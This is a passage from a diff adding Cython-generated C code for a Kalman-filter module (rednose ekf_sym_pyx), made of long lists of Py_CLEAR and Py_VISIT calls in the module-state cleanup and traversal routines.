Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_Ellipsis); + Py_CLEAR(clear_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_CLEAR(clear_module_state->__pyx_n_s_ImportError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_CLEAR(clear_module_state->__pyx_n_s_IndexError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_CLEAR(clear_module_state->__pyx_n_s_MemoryError); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_CLEAR(clear_module_state->__pyx_n_s_N); + Py_CLEAR(clear_module_state->__pyx_n_s_NotImplementedError); + Py_CLEAR(clear_module_state->__pyx_n_b_O); + Py_CLEAR(clear_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_CLEAR(clear_module_state->__pyx_n_s_P); + Py_CLEAR(clear_module_state->__pyx_n_s_P_initial); + Py_CLEAR(clear_module_state->__pyx_n_s_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_Q); + Py_CLEAR(clear_module_state->__pyx_n_s_R); + Py_CLEAR(clear_module_state->__pyx_n_s_R_map); + Py_CLEAR(clear_module_state->__pyx_n_s_Ri); + Py_CLEAR(clear_module_state->__pyx_n_s_Ri_b); + Py_CLEAR(clear_module_state->__pyx_n_s_Sequence); + Py_CLEAR(clear_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_b_T); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_CLEAR(clear_module_state->__pyx_n_s_ValueError); + Py_CLEAR(clear_module_state->__pyx_n_s_View_MemoryView); + Py_CLEAR(clear_module_state->__pyx_kp_b__10); + Py_CLEAR(clear_module_state->__pyx_kp_b__11); + Py_CLEAR(clear_module_state->__pyx_kp_b__12); + Py_CLEAR(clear_module_state->__pyx_kp_u__13); + Py_CLEAR(clear_module_state->__pyx_kp_u__14); + Py_CLEAR(clear_module_state->__pyx_kp_u__2); + Py_CLEAR(clear_module_state->__pyx_n_s__3); + Py_CLEAR(clear_module_state->__pyx_n_s__58); + Py_CLEAR(clear_module_state->__pyx_kp_u__6); + Py_CLEAR(clear_module_state->__pyx_kp_u__7); + Py_CLEAR(clear_module_state->__pyx_kp_b__9); + Py_CLEAR(clear_module_state->__pyx_n_s_a); + Py_CLEAR(clear_module_state->__pyx_n_s_abc); + Py_CLEAR(clear_module_state->__pyx_n_s_allocate_buffer); + Py_CLEAR(clear_module_state->__pyx_kp_u_and); + Py_CLEAR(clear_module_state->__pyx_n_s_args); + Py_CLEAR(clear_module_state->__pyx_n_s_args_map); + Py_CLEAR(clear_module_state->__pyx_n_s_asarray); + Py_CLEAR(clear_module_state->__pyx_n_s_ascontiguousarray); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_augment); + Py_CLEAR(clear_module_state->__pyx_n_s_base); + Py_CLEAR(clear_module_state->__pyx_n_s_c); + Py_CLEAR(clear_module_state->__pyx_n_u_c); + Py_CLEAR(clear_module_state->__pyx_n_s_class); + Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_collections); + Py_CLEAR(clear_module_state->__pyx_kp_s_collections_abc); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_CLEAR(clear_module_state->__pyx_n_s_copy); + Py_CLEAR(clear_module_state->__pyx_n_s_count); + Py_CLEAR(clear_module_state->__pyx_n_s_covs); + Py_CLEAR(clear_module_state->__pyx_n_s_covs_b); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_n_s_dim_augment); + Py_CLEAR(clear_module_state->__pyx_n_s_dim_augment_err); + Py_CLEAR(clear_module_state->__pyx_n_s_dim_main); + Py_CLEAR(clear_module_state->__pyx_n_s_dim_main_err); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_n_s_double); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype_is_object); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_encode); + Py_CLEAR(clear_module_state->__pyx_n_s_enumerate); + Py_CLEAR(clear_module_state->__pyx_n_s_error); + Py_CLEAR(clear_module_state->__pyx_n_s_estimates); + Py_CLEAR(clear_module_state->__pyx_n_s_extra_args); + Py_CLEAR(clear_module_state->__pyx_n_s_extra_args_map); + Py_CLEAR(clear_module_state->__pyx_n_s_filter_time); + Py_CLEAR(clear_module_state->__pyx_n_s_flags); + Py_CLEAR(clear_module_state->__pyx_n_s_format); + Py_CLEAR(clear_module_state->__pyx_n_s_fortran); + Py_CLEAR(clear_module_state->__pyx_n_u_fortran); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_gen_dir); + Py_CLEAR(clear_module_state->__pyx_n_s_get_augment_times); + Py_CLEAR(clear_module_state->__pyx_n_s_get_filter_time); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_s_global_var); + Py_CLEAR(clear_module_state->__pyx_n_s_global_vars); + Py_CLEAR(clear_module_state->__pyx_kp_u_got); + Py_CLEAR(clear_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_id); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_index); + Py_CLEAR(clear_module_state->__pyx_n_s_init_state); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_itemsize); + Py_CLEAR(clear_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_CLEAR(clear_module_state->__pyx_n_s_join); + Py_CLEAR(clear_module_state->__pyx_n_s_kind); + Py_CLEAR(clear_module_state->__pyx_n_s_logger); + Py_CLEAR(clear_module_state->__pyx_n_s_maha_test); + Py_CLEAR(clear_module_state->__pyx_n_s_maha_test_kinds); + Py_CLEAR(clear_module_state->__pyx_n_s_maha_thresh); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_max_rewind_age); + Py_CLEAR(clear_module_state->__pyx_n_s_memview); + Py_CLEAR(clear_module_state->__pyx_n_s_mode); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_name_2); + Py_CLEAR(clear_module_state->__pyx_n_s_nan); + Py_CLEAR(clear_module_state->__pyx_n_s_ndim); + Py_CLEAR(clear_module_state->__pyx_n_s_new); + Py_CLEAR(clear_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_CLEAR(clear_module_state->__pyx_n_s_norm_quats); + Py_CLEAR(clear_module_state->__pyx_n_s_np); + Py_CLEAR(clear_module_state->__pyx_n_s_numpy); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_CLEAR(clear_module_state->__pyx_n_s_obj); + Py_CLEAR(clear_module_state->__pyx_n_s_order); + Py_CLEAR(clear_module_state->__pyx_n_s_pack); + Py_CLEAR(clear_module_state->__pyx_n_s_pickle); + Py_CLEAR(clear_module_state->__pyx_n_s_predict); + Py_CLEAR(clear_module_state->__pyx_n_s_predict_and_update_batch); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_checksum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_result); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_type); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_vtable); + Py_CLEAR(clear_module_state->__pyx_n_s_quaternion_idxs); + Py_CLEAR(clear_module_state->__pyx_n_s_range); + Py_CLEAR(clear_module_state->__pyx_n_s_rednose_helpers_ekf_sym_pyx); + Py_CLEAR(clear_module_state->__pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_register); + Py_CLEAR(clear_module_state->__pyx_n_s_res); + Py_CLEAR(clear_module_state->__pyx_n_s_reset_rewind); + Py_CLEAR(clear_module_state->__pyx_n_s_rts_smooth); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_n_s_set_filter_time); + Py_CLEAR(clear_module_state->__pyx_n_s_set_global); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_shape); + Py_CLEAR(clear_module_state->__pyx_n_s_size); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_n_s_start); + Py_CLEAR(clear_module_state->__pyx_n_s_state); + Py_CLEAR(clear_module_state->__pyx_n_s_state_b); + Py_CLEAR(clear_module_state->__pyx_n_s_step); + Py_CLEAR(clear_module_state->__pyx_n_s_stop); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_indirect); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_struct); + Py_CLEAR(clear_module_state->__pyx_n_s_sys); + Py_CLEAR(clear_module_state->__pyx_n_s_t); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_tmpvec); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_CLEAR(clear_module_state->__pyx_n_s_unpack); + Py_CLEAR(clear_module_state->__pyx_n_s_update); + Py_CLEAR(clear_module_state->__pyx_n_u_utf8); + Py_CLEAR(clear_module_state->__pyx_n_s_val); + Py_CLEAR(clear_module_state->__pyx_n_s_version_info); + Py_CLEAR(clear_module_state->__pyx_n_s_x); + Py_CLEAR(clear_module_state->__pyx_n_s_x_initial); + Py_CLEAR(clear_module_state->__pyx_n_s_z); + Py_CLEAR(clear_module_state->__pyx_n_s_z_map); + Py_CLEAR(clear_module_state->__pyx_n_s_zi); + Py_CLEAR(clear_module_state->__pyx_n_s_zi_b); + Py_CLEAR(clear_module_state->__pyx_float_0_95); + Py_CLEAR(clear_module_state->__pyx_int_0); + Py_CLEAR(clear_module_state->__pyx_int_1); + Py_CLEAR(clear_module_state->__pyx_int_3); + Py_CLEAR(clear_module_state->__pyx_int_112105877); + Py_CLEAR(clear_module_state->__pyx_int_136983863); + Py_CLEAR(clear_module_state->__pyx_int_184977713); + Py_CLEAR(clear_module_state->__pyx_int_neg_1); + Py_CLEAR(clear_module_state->__pyx_k__17); + Py_CLEAR(clear_module_state->__pyx_k__18); + Py_CLEAR(clear_module_state->__pyx_k__19); + Py_CLEAR(clear_module_state->__pyx_k__28); + Py_CLEAR(clear_module_state->__pyx_k__33); + Py_CLEAR(clear_module_state->__pyx_slice__5); + Py_CLEAR(clear_module_state->__pyx_tuple__4); + Py_CLEAR(clear_module_state->__pyx_tuple__8); + Py_CLEAR(clear_module_state->__pyx_tuple__15); + Py_CLEAR(clear_module_state->__pyx_tuple__16); + Py_CLEAR(clear_module_state->__pyx_tuple__37); + Py_CLEAR(clear_module_state->__pyx_tuple__38); + Py_CLEAR(clear_module_state->__pyx_tuple__39); + Py_CLEAR(clear_module_state->__pyx_tuple__40); + Py_CLEAR(clear_module_state->__pyx_tuple__41); + Py_CLEAR(clear_module_state->__pyx_tuple__42); + Py_CLEAR(clear_module_state->__pyx_tuple__43); + Py_CLEAR(clear_module_state->__pyx_tuple__44); + Py_CLEAR(clear_module_state->__pyx_tuple__45); + Py_CLEAR(clear_module_state->__pyx_tuple__46); + Py_CLEAR(clear_module_state->__pyx_tuple__48); + Py_CLEAR(clear_module_state->__pyx_tuple__49); + Py_CLEAR(clear_module_state->__pyx_tuple__50); + Py_CLEAR(clear_module_state->__pyx_tuple__51); + Py_CLEAR(clear_module_state->__pyx_tuple__52); + Py_CLEAR(clear_module_state->__pyx_tuple__53); + Py_CLEAR(clear_module_state->__pyx_tuple__54); + Py_CLEAR(clear_module_state->__pyx_tuple__55); + Py_CLEAR(clear_module_state->__pyx_tuple__56); + Py_CLEAR(clear_module_state->__pyx_tuple__57); + Py_CLEAR(clear_module_state->__pyx_codeobj__20); + Py_CLEAR(clear_module_state->__pyx_codeobj__21); + Py_CLEAR(clear_module_state->__pyx_codeobj__22); + Py_CLEAR(clear_module_state->__pyx_codeobj__23); + Py_CLEAR(clear_module_state->__pyx_codeobj__24); + Py_CLEAR(clear_module_state->__pyx_codeobj__25); + Py_CLEAR(clear_module_state->__pyx_codeobj__26); + Py_CLEAR(clear_module_state->__pyx_codeobj__27); + Py_CLEAR(clear_module_state->__pyx_codeobj__29); + Py_CLEAR(clear_module_state->__pyx_codeobj__30); + Py_CLEAR(clear_module_state->__pyx_codeobj__31); + Py_CLEAR(clear_module_state->__pyx_codeobj__32); + Py_CLEAR(clear_module_state->__pyx_codeobj__34); + Py_CLEAR(clear_module_state->__pyx_codeobj__35); + Py_CLEAR(clear_module_state->__pyx_codeobj__36); + Py_CLEAR(clear_module_state->__pyx_codeobj__47); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_7cpython_4type_type); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_dtype); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flatiter); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_broadcast); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ndarray); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_generic); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_number); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_integer); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_signedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_inexact); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_floating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_complexfloating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flexible); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_character); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ufunc); + Py_VISIT(traverse_module_state->__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + Py_VISIT(traverse_module_state->__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + Py_VISIT(traverse_module_state->__pyx_array_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_array); + Py_VISIT(traverse_module_state->__pyx_MemviewEnum_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_MemviewEnum); + Py_VISIT(traverse_module_state->__pyx_memoryview_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryview); + Py_VISIT(traverse_module_state->__pyx_memoryviewslice_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryviewslice); + Py_VISIT(traverse_module_state->__pyx_kp_u_); + Py_VISIT(traverse_module_state->__pyx_n_s_ASCII); + Py_VISIT(traverse_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_AssertionError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_VISIT(traverse_module_state->__pyx_n_u_C); + Py_VISIT(traverse_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_VISIT(traverse_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_VISIT(traverse_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_augment); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_covs); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_get_augment_times); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_get_filter_time); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_init_state); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_maha_test); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_predict); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_predict_and_update_b); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_reset_rewind); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_rts_smooth); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_set_filter_time); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_set_global); + Py_VISIT(traverse_module_state->__pyx_n_s_EKF_sym_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_Ellipsis); + Py_VISIT(traverse_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_VISIT(traverse_module_state->__pyx_n_s_ImportError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_VISIT(traverse_module_state->__pyx_n_s_IndexError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_VISIT(traverse_module_state->__pyx_n_s_MemoryError); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_VISIT(traverse_module_state->__pyx_n_s_N); + Py_VISIT(traverse_module_state->__pyx_n_s_NotImplementedError); + Py_VISIT(traverse_module_state->__pyx_n_b_O); + Py_VISIT(traverse_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_VISIT(traverse_module_state->__pyx_n_s_P); + Py_VISIT(traverse_module_state->__pyx_n_s_P_initial); + Py_VISIT(traverse_module_state->__pyx_n_s_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_Q); + Py_VISIT(traverse_module_state->__pyx_n_s_R); + Py_VISIT(traverse_module_state->__pyx_n_s_R_map); + Py_VISIT(traverse_module_state->__pyx_n_s_Ri); + Py_VISIT(traverse_module_state->__pyx_n_s_Ri_b); + Py_VISIT(traverse_module_state->__pyx_n_s_Sequence); + Py_VISIT(traverse_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_b_T); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_VISIT(traverse_module_state->__pyx_n_s_ValueError); + Py_VISIT(traverse_module_state->__pyx_n_s_View_MemoryView); + Py_VISIT(traverse_module_state->__pyx_kp_b__10); + Py_VISIT(traverse_module_state->__pyx_kp_b__11); + Py_VISIT(traverse_module_state->__pyx_kp_b__12); + Py_VISIT(traverse_module_state->__pyx_kp_u__13); + Py_VISIT(traverse_module_state->__pyx_kp_u__14); + Py_VISIT(traverse_module_state->__pyx_kp_u__2); + Py_VISIT(traverse_module_state->__pyx_n_s__3); + Py_VISIT(traverse_module_state->__pyx_n_s__58); + Py_VISIT(traverse_module_state->__pyx_kp_u__6); + Py_VISIT(traverse_module_state->__pyx_kp_u__7); + Py_VISIT(traverse_module_state->__pyx_kp_b__9); + Py_VISIT(traverse_module_state->__pyx_n_s_a); + Py_VISIT(traverse_module_state->__pyx_n_s_abc); + Py_VISIT(traverse_module_state->__pyx_n_s_allocate_buffer); + Py_VISIT(traverse_module_state->__pyx_kp_u_and); + Py_VISIT(traverse_module_state->__pyx_n_s_args); + Py_VISIT(traverse_module_state->__pyx_n_s_args_map); + Py_VISIT(traverse_module_state->__pyx_n_s_asarray); + Py_VISIT(traverse_module_state->__pyx_n_s_ascontiguousarray); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_augment); + Py_VISIT(traverse_module_state->__pyx_n_s_base); + Py_VISIT(traverse_module_state->__pyx_n_s_c); + Py_VISIT(traverse_module_state->__pyx_n_u_c); + Py_VISIT(traverse_module_state->__pyx_n_s_class); + Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_collections); + Py_VISIT(traverse_module_state->__pyx_kp_s_collections_abc); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_VISIT(traverse_module_state->__pyx_n_s_copy); + Py_VISIT(traverse_module_state->__pyx_n_s_count); + Py_VISIT(traverse_module_state->__pyx_n_s_covs); + Py_VISIT(traverse_module_state->__pyx_n_s_covs_b); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_n_s_dim_augment); + Py_VISIT(traverse_module_state->__pyx_n_s_dim_augment_err); + Py_VISIT(traverse_module_state->__pyx_n_s_dim_main); + Py_VISIT(traverse_module_state->__pyx_n_s_dim_main_err); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_n_s_double); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype_is_object); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_encode); + Py_VISIT(traverse_module_state->__pyx_n_s_enumerate); + Py_VISIT(traverse_module_state->__pyx_n_s_error); + Py_VISIT(traverse_module_state->__pyx_n_s_estimates); + Py_VISIT(traverse_module_state->__pyx_n_s_extra_args); + Py_VISIT(traverse_module_state->__pyx_n_s_extra_args_map); + Py_VISIT(traverse_module_state->__pyx_n_s_filter_time); + Py_VISIT(traverse_module_state->__pyx_n_s_flags); + Py_VISIT(traverse_module_state->__pyx_n_s_format); + Py_VISIT(traverse_module_state->__pyx_n_s_fortran); + Py_VISIT(traverse_module_state->__pyx_n_u_fortran); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_gen_dir); + Py_VISIT(traverse_module_state->__pyx_n_s_get_augment_times); + Py_VISIT(traverse_module_state->__pyx_n_s_get_filter_time); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_s_global_var); + Py_VISIT(traverse_module_state->__pyx_n_s_global_vars); + Py_VISIT(traverse_module_state->__pyx_kp_u_got); + Py_VISIT(traverse_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_id); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_index); + Py_VISIT(traverse_module_state->__pyx_n_s_init_state); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_itemsize); + Py_VISIT(traverse_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_VISIT(traverse_module_state->__pyx_n_s_join); + Py_VISIT(traverse_module_state->__pyx_n_s_kind); + Py_VISIT(traverse_module_state->__pyx_n_s_logger); + Py_VISIT(traverse_module_state->__pyx_n_s_maha_test); + Py_VISIT(traverse_module_state->__pyx_n_s_maha_test_kinds); + Py_VISIT(traverse_module_state->__pyx_n_s_maha_thresh); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_max_rewind_age); + Py_VISIT(traverse_module_state->__pyx_n_s_memview); + Py_VISIT(traverse_module_state->__pyx_n_s_mode); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_name_2); + Py_VISIT(traverse_module_state->__pyx_n_s_nan); + Py_VISIT(traverse_module_state->__pyx_n_s_ndim); + Py_VISIT(traverse_module_state->__pyx_n_s_new); + Py_VISIT(traverse_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_VISIT(traverse_module_state->__pyx_n_s_norm_quats); + Py_VISIT(traverse_module_state->__pyx_n_s_np); + Py_VISIT(traverse_module_state->__pyx_n_s_numpy); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_VISIT(traverse_module_state->__pyx_n_s_obj); + Py_VISIT(traverse_module_state->__pyx_n_s_order); + Py_VISIT(traverse_module_state->__pyx_n_s_pack); + Py_VISIT(traverse_module_state->__pyx_n_s_pickle); + Py_VISIT(traverse_module_state->__pyx_n_s_predict); + Py_VISIT(traverse_module_state->__pyx_n_s_predict_and_update_batch); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_checksum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_result); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_type); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_vtable); + Py_VISIT(traverse_module_state->__pyx_n_s_quaternion_idxs); + Py_VISIT(traverse_module_state->__pyx_n_s_range); + Py_VISIT(traverse_module_state->__pyx_n_s_rednose_helpers_ekf_sym_pyx); + Py_VISIT(traverse_module_state->__pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_register); + Py_VISIT(traverse_module_state->__pyx_n_s_res); + Py_VISIT(traverse_module_state->__pyx_n_s_reset_rewind); + Py_VISIT(traverse_module_state->__pyx_n_s_rts_smooth); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_n_s_set_filter_time); + Py_VISIT(traverse_module_state->__pyx_n_s_set_global); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_shape); + Py_VISIT(traverse_module_state->__pyx_n_s_size); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + 